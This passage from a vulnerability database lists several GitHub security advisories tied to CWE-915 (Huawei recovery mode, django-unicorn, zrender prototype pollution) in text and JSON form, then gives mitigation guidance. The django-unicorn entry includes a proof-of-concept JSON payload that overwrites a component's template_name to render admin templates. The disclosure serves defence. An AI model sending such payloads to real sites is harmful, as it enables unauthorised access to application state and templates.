      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in merge-change"
}

GHSA-FFCF-48J3-23JR

Vulnerability from github – Published: 2023-03-28 00:34 – Updated: 2025-02-19 18:32
VLAI
Details

The recovery mode for updates has a vulnerability that causes arbitrary disk modification. Successful exploitation of this vulnerability may affect confidentiality.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-48359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-27T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "The recovery mode for updates has a vulnerability that causes arbitrary disk modification. Successful exploitation of this vulnerability may affect confidentiality.",
  "id": "GHSA-ffcf-48j3-23jr",
  "modified": "2025-02-19T18:32:12Z",
  "published": "2023-03-28T00:34:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48359"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2023/3"
    },
    {
      "type": "WEB",
      "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202303-0000001529824505"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FFV6-JJ46-X367

Vulnerability from github – Published: 2026-03-11 00:11 – Updated: 2026-03-11 05:45
VLAI
Summary
django-unicorn affected by component state manipulation via unvalidated attribute access
Details

Summary

Component state manipulation is possible in django-unicorn due to missing access control checks during property updates and method calls. An attacker can bypass the intended _is_public protection to modify internal attributes such as template_name or trigger protected methods.

Vulnerability Details: Component Access Control Bypass

Security analysis identified that the framework fails to enforce visibility boundaries defined by _is_public within the action parsers. Specifically, the logic in set_property_value() and _call_method_name() utilizes getattr and setattr directly on component instances without verifying if the target attribute or method is explicitly marked as public.

Vulnerability resides in: - src/django_unicorn/views/action_parsers/call_method.py - src/django_unicorn/views/action_parsers/utils.py

While Django's template engine restricts rendering to registered directories, an unauthorized user can still force a component to render sensitive templates (e.g., admin layouts) from other installed applications or reset the component state by invoking the internal reset() method.

Proof of Concept (PoC)

Attacker can overwrite the template_name attribute by sending a crafted JSON payload to the message endpoint:

  1. Construct a payload targeting a protected attribute: json { "actionQueue": [ { "type": "syncInput", "payload": { "name": "template_name", "value": "admin/base.html" } } ], "data": {}, "meta": "<checksum_of_empty_dict>" }
  2. The server-side component updates its internal state: self.template_name = "admin/base.html".
  3. Subsequent re-rendering displays the content of the targeted template, bypassing intended component logic.

Impact

Low severity. The risk is limited to unauthorized manipulation of component state and rendering of existing templates within the application's configured template directories. Remote Code Execution (RCE) is not possible via this vector.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "django-unicorn"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.67.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31815"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:11:08Z",
    "nvd_published_at": "2026-03-10T22:16:19Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nComponent state manipulation is possible in `django-unicorn` due to missing access control checks during property updates and method calls. An attacker can bypass the intended `_is_public` protection to modify internal attributes such as `template_name` or trigger protected methods.\n\n## Vulnerability Details: Component Access Control Bypass\nSecurity analysis identified that the framework fails to enforce visibility boundaries defined by `_is_public` within the action parsers. Specifically, the logic in `set_property_value()` and `_call_method_name()` utilizes `getattr` and `setattr` directly on component instances without verifying if the target attribute or method is explicitly marked as public.\n\nVulnerability resides in:\n- `src/django_unicorn/views/action_parsers/call_method.py`\n- `src/django_unicorn/views/action_parsers/utils.py`\n\nWhile Django\u0027s template engine restricts rendering to registered directories, an unauthorized user can still force a component to render sensitive templates (e.g., admin layouts) from other installed applications or reset the component state by invoking the internal `reset()` method.\n\n## Proof of Concept (PoC)\nAttacker can overwrite the `template_name` attribute by sending a crafted JSON payload to the message endpoint:\n\n1. Construct a payload targeting a protected attribute:\n   ```json\n   {\n     \"actionQueue\": [\n       {\n         \"type\": \"syncInput\",\n         \"payload\": { \"name\": \"template_name\", \"value\": \"admin/base.html\" }\n       }\n     ],\n     \"data\": {},\n     \"meta\": \"\u003cchecksum_of_empty_dict\u003e\"\n   }\n   ```\n2. The server-side component updates its internal state: `self.template_name = \"admin/base.html\"`.\n3. Subsequent re-rendering displays the content of the targeted template, bypassing intended component logic.\n\n## Impact\nLow severity. The risk is limited to unauthorized manipulation of component state and rendering of existing templates within the application\u0027s configured template directories. Remote Code Execution (RCE) is not possible via this vector.",
  "id": "GHSA-ffv6-jj46-x367",
  "modified": "2026-03-11T05:45:51Z",
  "published": "2026-03-11T00:11:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/django-commons/django-unicorn/security/advisories/GHSA-ffv6-jj46-x367"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31815"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/django-commons/django-unicorn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "django-unicorn affected by component state manipulation via unvalidated attribute access"
}

GHSA-FHV8-FX5F-7FXF

Vulnerability from github – Published: 2021-09-20 19:53 – Updated: 2024-12-06 18:20
VLAI
Summary
Prototype Pollution in the merge and clone helper methods
Details

Impact

Using merge and clone helper methods in the src/core/util.ts module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly.

Patches

It has been patched in https://github.com/ecomfe/zrender/pull/826. Users should update zrender to 5.2.1. and update echarts to 5.2.1 if project is using echarts.

References

NA

For more information

NA

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "zrender"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.3.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "zrender"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-39227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-17T17:51:46Z",
    "nvd_published_at": "2021-09-17T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nUsing `merge` and `clone` helper methods in the `src/core/util.ts` module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly.\n\n### Patches\n \nIt has been patched in https://github.com/ecomfe/zrender/pull/826. \nUsers should update zrender to `5.2.1`.  and update echarts to `5.2.1` if project is using echarts.\n\n### References\nNA\n\n### For more information\nNA\n",
  "id": "GHSA-fhv8-fx5f-7fxf",
  "modified": "2024-12-06T18:20:49Z",
  "published": "2021-09-20T19:53:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/security/advisories/GHSA-fhv8-fx5f-7fxf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39227"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/pull/826"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ecomfe/zrender"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/releases/tag/5.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in the merge and clone helper methods"
}

Mitigation
Implementation
  • If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists.
  • For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment.
Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes.

No CAPEC attack patterns related to this CWE.